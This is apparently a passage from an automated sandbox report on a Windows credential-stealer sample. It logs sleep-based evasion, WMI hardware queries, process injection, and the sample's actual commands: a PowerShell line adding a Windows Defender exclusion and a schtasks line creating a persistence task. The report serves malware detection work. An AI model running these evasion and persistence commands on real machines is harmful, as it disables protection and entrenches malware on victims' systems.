                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7188Thread sleep count: 2006 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7188Thread sleep count: 1775 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99742s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99513s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99379s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99236s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -99109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98882s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98192s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -98062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -97953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -97843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7488Thread sleep count: 642 > 30
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99782s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7488Thread sleep count: 2146 > 30
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99657s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99532s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99407s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -99063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -98938s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -98813s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -98688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -98469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99742Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99513Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99379Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99236Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99109Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98999Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98882Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98656Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98546Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98437Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98328Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98192Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98062Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 97953Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 97843Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99891
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99782
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99657
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99532
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99407
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99188
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99063
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98938
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98813
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98688
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98578
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98469
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477
                      Source: TuZRpLi.exe, 00000011.00000002.3268134309.0000000006110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3267248646.00000000069F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F22019 rdtsc 17_2_05F22019
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMemory written: C:\Users\user\AppData\Roaming\TuZRpLi.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
